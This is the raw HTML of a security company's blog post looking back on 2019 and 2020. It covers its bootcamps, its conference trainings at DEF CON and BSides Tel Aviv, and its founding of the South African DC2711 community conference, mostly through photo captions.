10.5pt; line-height: 16.100000381469727px;"> </span></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-89184054691808686852020-12-10T15:38:00.000+02:002020-12-10T15:38:59.204+02:00Looking back on 2019 and 2020…<div style="text-align: left;"><span style="font-size: large;">Every year we look back on the previous year and reflect on what happened, our achievements, lessons learnt etc. 
However, last year this fell through, i.e. we did not look back on 2019, which is just as well given what happened / is happening in 2020, or maybe this is some version of the butterfly effect Ƹ̵̡Ӝ̵̨̄Ʒ (∩╹□╹∩)<br /><br /></span></div><div style="text-align: left;"><span style="font-size: large;">Okay okay, we are being a bit dramatic here, but it is 2020 and anything is possible. Besides our newly acquired l33t ASCII art one-liners ᕕ(⌐■_■)ᕗ, here are some of the highlights of the last 2 years.</span></div><div style="text-align: left;"><span style="font-size: large;"><br /></span></div><h2 style="text-align: left;"><span style="font-size: large;">I</span>nternships / Bootcamps</h2><p><span style="font-size: large;">We ran two successful internships / bootcamps; this is an important part of our strategy to contribute towards developing / nurturing local information skills in South Africa. For additional information on the two bootcamps that we ran in the past two years, refer to:</span></p><p></p><ul style="text-align: left;"><li><span style="font-size: large;"><a href="https://blog.telspace.co.za/2019/03/telspace-systems-internshipboot-camp.html">https://blog.telspace.co.za/2019/03/telspace-systems-internshipboot-camp.html</a> </span></li><li><span style="font-size: large;"><a href="https://blog.telspace.co.za/2020/01/boot-camp-2020.html">https://blog.telspace.co.za/2020/01/boot-camp-2020.html</a> </span></li></ul><p></p><p><span style="font-size: large;">From the bootcamps we ran, we ended up hiring 5 new staff members who joined our team and are now on their way to achieving great things both at Telspace and in the community (watch this space). </span></p><p><span style="font-size: large;">Those who did not make it with us ended up, in most cases, finding jobs at other info sec companies and / or corporates, which is the exact reason we started the bootcamp: to filter more people into the industry as a whole, not just specifically at Telspace. 
We also assisted those that could not find anywhere to be placed, by sending their CVs to some of our customers and / or other competitors. Below are some pictures of the bootcamp: </span></p><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dimYxW5pgGlJ9dB4TF9VnJWKE2jXuqTyB5Ym34lMeDqVZvnaTPFGo3tKTfK0ZUc0yD_ekxwAu9U-YTQfE6UnGrRTtyhkA12BMWMHK6xZnOH2Ggnah031M-e9Ko-3qH1oIOYPj-XB7yKH/" style="margin-left: auto; margin-right: auto;"><img data-original-height="778" data-original-width="1600" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-dimYxW5pgGlJ9dB4TF9VnJWKE2jXuqTyB5Ym34lMeDqVZvnaTPFGo3tKTfK0ZUc0yD_ekxwAu9U-YTQfE6UnGrRTtyhkA12BMWMHK6xZnOH2Ggnah031M-e9Ko-3qH1oIOYPj-XB7yKH/w640-h312/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2020 Bootcamp<br /></td></tr></tbody></table><br /><br /><p></p><h3 style="text-align: left;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoxRYTmKSz4WAnt1ptUWBFySpfDyny1zFm4xTlwm_poEOS3s0BBy8usdWI1GUD_ZVvVHM_Mm-kcl3kvQ9WnV1TN-PY93AD4O7wwuebztKD5QapVNGT6mwZbxgcCAW2VAvpQVjoqWiLnX-D/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1200" data-original-width="1600" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoxRYTmKSz4WAnt1ptUWBFySpfDyny1zFm4xTlwm_poEOS3s0BBy8usdWI1GUD_ZVvVHM_Mm-kcl3kvQ9WnV1TN-PY93AD4O7wwuebztKD5QapVNGT6mwZbxgcCAW2VAvpQVjoqWiLnX-D/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">2019 Bootcamp</td></tr></tbody></table></h3><h2 style="text-align: 
left;">Talks and Research</h2><div><br /></div><div style="text-align: left;"><span style="font-size: large;">Over the last two years we have given a number of talks and facilitated training both locally and internationally; below are some of the highlights:</span></div><div style="text-align: left;"><span style="font-size: large;"><br /></span></div><h2 style="text-align: left;">Training - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows</h2><div><br /></div><div style="text-align: left;"><span style="font-size: large;">We gave this training at both DEF CON 1.0 China and DEF CON 27 - Vegas in 2019, presented by Dino and Manny. It was really great to meet up with all our friends at DEF CON and make new friends; hopefully in 2021 we will all be able to meet up again!</span></div><p><br /></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCXkan4MYYYbOomkqlatbgSvw5iuGZ8AEZi3m3xUwfw19YHdrJ23z38Y1wWiG3CiW9-SYONW39_fNOsFQf411TkD8XjdiYDXdyjOiRYP0MRX-cQ74YRGGh83f1VFGbJlSJ5rJl-m2uKYi/" style="margin-left: auto; margin-right: auto;"><img data-original-height="960" data-original-width="1280" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMCXkan4MYYYbOomkqlatbgSvw5iuGZ8AEZi3m3xUwfw19YHdrJ23z38Y1wWiG3CiW9-SYONW39_fNOsFQf411TkD8XjdiYDXdyjOiRYP0MRX-cQ74YRGGh83f1VFGbJlSJ5rJl-m2uKYi/w400-h300/image.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Undercover hackers on their way to DEFCON China (no black hoody = no hacking going on here)</td></tr></tbody></table><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ssfoMZgNnWicskLrTSV-EcejtWCau5RyJThHcE3GfP7RS3s8KgZJTWb5vNHAR-CPQbbaZ8ZuN0F5KjxL3iKxiOXmje1Hu9-9_ZFTmiYAQ6s8zhvcRVJSR8LTkgk6IJKIEc8rpeSLC9q9/" style="margin-left: auto; margin-right: auto;"><img data-original-height="905" data-original-width="1208" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1ssfoMZgNnWicskLrTSV-EcejtWCau5RyJThHcE3GfP7RS3s8KgZJTWb5vNHAR-CPQbbaZ8ZuN0F5KjxL3iKxiOXmje1Hu9-9_ZFTmiYAQ6s8zhvcRVJSR8LTkgk6IJKIEc8rpeSLC9q9/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Epic artwork, epic venue! #HackerVibes</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXEpJZ3F6xINc_vTMsCMpRZZIRTF6X4VdLsGqQaOIcAfZfRJrLV_-GoLAZBummkyDcwTAMjUGbp4EztWAmf0i2x4e4Z01ajYTuNPm4-mjvg99OvsTsduUuzou9IigYdWjcAP8Jv98mLfLw/" style="margin-left: auto; margin-right: auto;"><img data-original-height="841" data-original-width="1010" height="533" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXEpJZ3F6xINc_vTMsCMpRZZIRTF6X4VdLsGqQaOIcAfZfRJrLV_-GoLAZBummkyDcwTAMjUGbp4EztWAmf0i2x4e4Z01ajYTuNPm4-mjvg99OvsTsduUuzou9IigYdWjcAP8Jv98mLfLw/w640-h533/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The actual venue where we were presenting but we totally missed the entrance and went on an adventure, thank goodness for Grifter!</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheCmtjcdB3FcMiC5SQfZAsv8xQaK86xt4wB8TcUD5zVRah0NHbmeONvNRc_KfV5r942iHeIF205WXnOMyTasDGKrvcfZvm0YHzcy8E4szbtXpciAuWUG-9_-Zylrk0tYIS8TEq0kes7SAM/" style="margin-left: auto; margin-right: auto;"><img data-original-height="892" data-original-width="1194" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheCmtjcdB3FcMiC5SQfZAsv8xQaK86xt4wB8TcUD5zVRah0NHbmeONvNRc_KfV5r942iHeIF205WXnOMyTasDGKrvcfZvm0YHzcy8E4szbtXpciAuWUG-9_-Zylrk0tYIS8TEq0kes7SAM/w640-h478/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Our names in lights O_O</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-BGhx_7KgQJ787rBpJVVSWBWIS-odn0d0OjIDucusMSd-cARxerAguMPQkElPgFIglQbPgTCIVJCkPH5cJtnm95vVeGsK4743OYQMiWNzU2GdOU24djaB1T3btL8y9NMAXnGs2lBBuLuF/" style="margin-left: auto; margin-right: auto;"><img data-original-height="914" data-original-width="1218" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-BGhx_7KgQJ787rBpJVVSWBWIS-odn0d0OjIDucusMSd-cARxerAguMPQkElPgFIglQbPgTCIVJCkPH5cJtnm95vVeGsK4743OYQMiWNzU2GdOU24djaB1T3btL8y9NMAXnGs2lBBuLuF/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">A full house for all our classes with great interactions and learning!</td></tr></tbody></table><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlOO7oN2M_KsbX7-N073hu44POC7uD9AmOCaFFbDBavgXg0ZSzu9DduIWm3mAbsiV9yNbbGHo5FOyBbrbxaIQsIy2250K3YlI6tHtAuU5RIkm4AS0YFTc5b4QbGbqkLPrXcwzswGCwNn9y/" style="margin-left: auto; margin-right: auto;"><img data-original-height="914" data-original-width="1218" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlOO7oN2M_KsbX7-N073hu44POC7uD9AmOCaFFbDBavgXg0ZSzu9DduIWm3mAbsiV9yNbbGHo5FOyBbrbxaIQsIy2250K3YlI6tHtAuU5RIkm4AS0YFTc5b4QbGbqkLPrXcwzswGCwNn9y/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Party time, and man was it a party x_X</td></tr></tbody></table><p></p><p><br /><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicrxRVbMYwmAfs19xrNZDeTn4dOLGEKqxMKc8GDytBFSbYw65GNr81nwuVSjexLbY223TD07YlIO8_U_ROtP83t475cYIhNLgI7Whxdn1Zwv27ZD-VuUdgBZ-OO7fPnS6Gp7S3GEHWRRHM/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="960" data-original-width="1280" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicrxRVbMYwmAfs19xrNZDeTn4dOLGEKqxMKc8GDytBFSbYw65GNr81nwuVSjexLbY223TD07YlIO8_U_ROtP83t475cYIhNLgI7Whxdn1Zwv27ZD-VuUdgBZ-OO7fPnS6Gp7S3GEHWRRHM/w640-h480/image.png" width="640" /></a></div><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjEYP5dWVRyOCCF6WVTnzJwcL-eETJKWeFQTpnvYNguJ8ySp8SPaVXkeBFfryMfiS6q2irSAVrgDXIUnBThJI0LPy-OBHZWW0RQeeVyWBQOMdZGqyo5WjVXTYcLg3gj34AnXE6Zu65LCHw/" style="margin-left: auto; margin-right: auto;"><img data-original-height="682" data-original-width="1024" height="426" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjEYP5dWVRyOCCF6WVTnzJwcL-eETJKWeFQTpnvYNguJ8ySp8SPaVXkeBFfryMfiS6q2irSAVrgDXIUnBThJI0LPy-OBHZWW0RQeeVyWBQOMdZGqyo5WjVXTYcLg3gj34AnXE6Zu65LCHw/w640-h426/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Thanks to all the trainers, organisers, volunteers and everyone that made DEFCON China 1.0 possible <3</td></tr></tbody></table><p></p><h2 style="text-align: left;">Training – Ethical Hacking 101</h2><p></p><div style="text-align: left;"><span style="font-size: large;">Right after China we were off to sunny Tel Aviv in Israel for BSides Tel Aviv, where we were sponsors and also gave our Ethical Hacking 101 training course. The local Israeli hacking community is really awesome, and 100% of the proceeds of our training course were given back to be used by the local BSides TLV community. </span></div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp3E7XZJXbo38duccccYcN0Van6TYEp3gSD2kUAz5nrm90b7BNQFmjLb2ahHpn7QiDOOr2PpdOrcqb69SrCiv5Ttf0ZpeJR-pqdiTH8Usi_JubuqrVSZWObcfuXOAZu3czSErEHZwQyEf1/" style="margin-left: auto; margin-right: auto;"><img data-original-height="786" data-original-width="1176" height="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp3E7XZJXbo38duccccYcN0Van6TYEp3gSD2kUAz5nrm90b7BNQFmjLb2ahHpn7QiDOOr2PpdOrcqb69SrCiv5Ttf0ZpeJR-pqdiTH8Usi_JubuqrVSZWObcfuXOAZu3czSErEHZwQyEf1/w640-h428/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Some cool art work on Aviv Beach</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp-MaZVDvAz1bKptmy7QA0eBeb10yEvdTmgZ3nk_oXd-00l0H7fDpLxiJE9FTLJPbp10HYND3e7C1ASTPW8P-ezGzKcGb52rBC8o6xj9LhMFJYXCG2NM6D7OA-T397OcFFmPUZfLK_yC6Q/" style="margin-left: auto; margin-right: auto;"><img data-original-height="744" data-original-width="1030" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp-MaZVDvAz1bKptmy7QA0eBeb10yEvdTmgZ3nk_oXd-00l0H7fDpLxiJE9FTLJPbp10HYND3e7C1ASTPW8P-ezGzKcGb52rBC8o6xj9LhMFJYXCG2NM6D7OA-T397OcFFmPUZfLK_yC6Q/w640-h462/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Raul (left) and Manny (right), ready to present to the community</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2_1S6XoP5deeQ_SdDaO5zwpufaewSJGpTk0cZB_CC5QTwpczCxG86YpESWhpXm3ZATkc7N4tXYRcnFoq4ZRjbBK9Vub1XVuEgA0pUYbv_s9tE2ZrXDGKr_QevBI9ESh4bQBHGDIL_QK29/" style="margin-left: auto; margin-right: auto;"><img data-original-height="788" data-original-width="1206" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2_1S6XoP5deeQ_SdDaO5zwpufaewSJGpTk0cZB_CC5QTwpczCxG86YpESWhpXm3ZATkc7N4tXYRcnFoq4ZRjbBK9Vub1XVuEgA0pUYbv_s9tE2ZrXDGKr_QevBI9ESh4bQBHGDIL_QK29/w640-h418/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Packed house for the kick off of BSides TLV 2019</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjidtbFILbLeJr7zB3PA8-CrA_Ez5rmA1kbbCxnbysOk9bBapO624b8vwnUfDI1D7mKegnWTGWL56lRiMRzRJUl4jEiqtSqdU3274KR3gspiaTU2cf69R7EbQHzrotg0xDIPABLFUPKsOr/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1280" data-original-width="960" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjidtbFILbLeJr7zB3PA8-CrA_Ez5rmA1kbbCxnbysOk9bBapO624b8vwnUfDI1D7mKegnWTGWL56lRiMRzRJUl4jEiqtSqdU3274KR3gspiaTU2cf69R7EbQHzrotg0xDIPABLFUPKsOr/w300-h400/image.png" width="300" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Aaaaaaaaaaaaaaaaaaaand guess where we are now, VEGAAAAAAS!</td></tr></tbody></table><br /><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKTy70qRv8MzTIUeuBoiEMeYsa2z5EpQyg1x-L3lOOJfMfbw4QRBl0R15ekR4j6wrABNYskElEMZFp4kfh5xsNu8rDtoC9wSihqKZetMsvny8yiwImCXMeLIewnljkgwUoHdVw15CoUG1z/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="1280" data-original-width="720" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKTy70qRv8MzTIUeuBoiEMeYsa2z5EpQyg1x-L3lOOJfMfbw4QRBl0R15ekR4j6wrABNYskElEMZFp4kfh5xsNu8rDtoC9wSihqKZetMsvny8yiwImCXMeLIewnljkgwUoHdVw15CoUG1z/w225-h400/image.png" width="225" /></a></div><div><br /></div><div><br /></div><div><span style="font-size: large;">Here we gave our Hack to Basics training for our DEF CON workshop, got to catch up with old friends, make new friends, nothing else like DEF CON Vegas!</span></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL8d1JWQO3AXvGtnsn2GeAEMi2pbRaYqtsT407X2UqKwmSwpvCF_TmmTuNXefED7PrUgwVrdF7m_D6fbGTh_3bzQuFTG69PX1Qhx24_7N8jAMgcAFGX-vVkTieXmuKMCQ3QSAudfrQUIo1/" style="margin-left: 1em; margin-right: 1em;"><img 
data-original-height="428" data-original-width="853" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL8d1JWQO3AXvGtnsn2GeAEMi2pbRaYqtsT407X2UqKwmSwpvCF_TmmTuNXefED7PrUgwVrdF7m_D6fbGTh_3bzQuFTG69PX1Qhx24_7N8jAMgcAFGX-vVkTieXmuKMCQ3QSAudfrQUIo1/w640-h322/image.png" width="640" /></a></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnScijpsaIiFPsJR3PNBBqNcd9LmOZNUZoWfdTg1VYE9pJTtVnGGsD1Mb0fenH5-F34g_FyVrvI00SeXXDq_KWNW-zvTsaWeWCtPFwvULTrXWzuVAAh2Ol6kqAad1RE3TsNZv1uEEu8BvG/s662/2.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="499" data-original-width="662" height="482" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnScijpsaIiFPsJR3PNBBqNcd9LmOZNUZoWfdTg1VYE9pJTtVnGGsD1Mb0fenH5-F34g_FyVrvI00SeXXDq_KWNW-zvTsaWeWCtPFwvULTrXWzuVAAh2Ol6kqAad1RE3TsNZv1uEEu8BvG/w640-h482/2.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"> Students from one of our classes (the ones that wanted to be in the picture that is!).</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihYWyvjryPtjKAUVxiwM-3bDIqbhv6h1zcw3MqBa2KXao1aR_aBUi_ef2k9TZVmNRnclHpo6ratoU9oKU0eLieM5F5nBVKO2Pw7NdT9LtGTpV0T3RVkR8dTnjv5_tZI6gkKpSPL4dTLWiw/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1280" data-original-width="720" height="400" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihYWyvjryPtjKAUVxiwM-3bDIqbhv6h1zcw3MqBa2KXao1aR_aBUi_ef2k9TZVmNRnclHpo6ratoU9oKU0eLieM5F5nBVKO2Pw7NdT9LtGTpV0T3RVkR8dTnjv5_tZI6gkKpSPL4dTLWiw/w225-h400/image.png" width="225" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">#TheBadgeLife – we got to have them all (or at least some!).<br /><br /></td></tr></tbody></table><span style="text-align: center;"><span> </span></span><p></p><h2 style="text-align: left;">Back to the Motherland</h2><p></p><div style="text-align: left;"><span style="font-size: large;">Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this, we established the DC2711 group in South Africa and had our first conference last year on the 5th of October 2019. The conference was completely FREE to attend (for the community) and allowed various international and local researchers to share their research. For a full list of who spoke, refer to <a href="https://www.dc2711.co.za/dc2711_Presentations.html">https://www.dc2711.co.za/dc2711_Presentations.html</a>. 
Attendees also got swag packs full of DC2711 goodies.</span></div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCFERsKR2LMlUm5DXg0uZ-p9Z3-aI6Pt2GO2k-psG__vTCjmU_UdGm6tukoYnO87jZjhIbCmlL4p8XCNM3XTh-tewaot6nKTjxHEp2GlEC0Jia4HngAU2s_GW5nXguO0I3sZJI7tlQfne/" style="margin-left: auto; margin-right: auto;"><img data-original-height="546" data-original-width="971" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCFERsKR2LMlUm5DXg0uZ-p9Z3-aI6Pt2GO2k-psG__vTCjmU_UdGm6tukoYnO87jZjhIbCmlL4p8XCNM3XTh-tewaot6nKTjxHEp2GlEC0Jia4HngAU2s_GW5nXguO0I3sZJI7tlQfne/w640-h360/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Jayson Street handing Dino the official DEF CON flag for the DC2711 Group</td></tr></tbody></table><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEJU-HGO38WDrx4DS3WuZSip2Gmz1_ZQaGx4bcx3vZ-qIUdrfmmugoM21bWgKjzIAtf7cGCn-qpjBOVwdEfZekAjwl3PJ7rHc4CTpFvVJ5Lvt_dXlpTLm8TNsoYyB9pc5HJSV2JIfsaUPK/" style="margin-left: auto; margin-right: auto;"><img data-original-height="287" data-original-width="991" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEJU-HGO38WDrx4DS3WuZSip2Gmz1_ZQaGx4bcx3vZ-qIUdrfmmugoM21bWgKjzIAtf7cGCn-qpjBOVwdEfZekAjwl3PJ7rHc4CTpFvVJ5Lvt_dXlpTLm8TNsoYyB9pc5HJSV2JIfsaUPK/w640-h186/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The official DC2711 sticker but more importantly, a coffeeeeee voucher :D</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" 
class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6eHERKnFQrWiUgVvfYadtPkfpRyZNMmO1rok7Cmel4GvvBEiH4Wy1GHuiJkXLZlhNxfhqh_nnhfMLnt3va05ZQXiNkMYtQ3T2w550KYHTmEBkHMtbouHQoCd-aiCRZj2CygGsxNT1IR9/" style="margin-left: auto; margin-right: auto;"><img data-original-height="620" data-original-width="860" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR6eHERKnFQrWiUgVvfYadtPkfpRyZNMmO1rok7Cmel4GvvBEiH4Wy1GHuiJkXLZlhNxfhqh_nnhfMLnt3va05ZQXiNkMYtQ3T2w550KYHTmEBkHMtbouHQoCd-aiCRZj2CygGsxNT1IR9/w640-h462/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">DC2711 Badges</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU5SPdpiJmNk4Pxpa_MeAzYxKu3zwv1rS_lE4A7Bl9DoQ5dTLpIg0ehkk6_pulYsUVxPe1q3lf7XfmPDEOw7VSMlbeZDquqyaG62u1y7G4-Ikx3wItZfDllBKv9pTRhfDoS1CXE-vOD2hF/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1536" data-original-width="2048" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU5SPdpiJmNk4Pxpa_MeAzYxKu3zwv1rS_lE4A7Bl9DoQ5dTLpIg0ehkk6_pulYsUVxPe1q3lf7XfmPDEOw7VSMlbeZDquqyaG62u1y7G4-Ikx3wItZfDllBKv9pTRhfDoS1CXE-vOD2hF/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Some official swag :D</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Aer0Q0H-mTvlrZdfqhqYgp-aMH7ivHCjSyYJPYIWHtkbaFRqzu944oR9mFWU5mpApqwShpBQ5R8Xmw4sSdVRzr8SG056ctPLJTWSEfzsEC_-4uQiwEA9mi8q3K0UJH_Ha-fIScnWvPFs/" style="margin-left: auto; margin-right: auto;"><img data-original-height="1536" data-original-width="2048" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Aer0Q0H-mTvlrZdfqhqYgp-aMH7ivHCjSyYJPYIWHtkbaFRqzu944oR9mFWU5mpApqwShpBQ5R8Xmw4sSdVRzr8SG056ctPLJTWSEfzsEC_-4uQiwEA9mi8q3K0UJH_Ha-fIScnWvPFs/w640-h480/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Dino and Manny with their fun faces on :P</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjqi38Ja3o3cIqlOSCSJwwUxUSPns96ZlYzXnWX0bfBBgPW-P4kZHGiy40eif-OnvpRqqfFgZxUVBqIT3PDsVNjURqf4zgUtxK3x_42W_y9dmXamFw0KBlkiLIlcAnFXAi7FJO6hEowVa-/" style="margin-left: auto; margin-right: auto;"><img data-original-height="676" data-original-width="1024" height="422" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjqi38Ja3o3cIqlOSCSJwwUxUSPns96ZlYzXnWX0bfBBgPW-P4kZHGiy40eif-OnvpRqqfFgZxUVBqIT3PDsVNjURqf4zgUtxK3x_42W_y9dmXamFw0KBlkiLIlcAnFXAi7FJO6hEowVa-/w640-h422/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">#DuckArmyInvasion</td></tr></tbody></table><br /><br /><p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
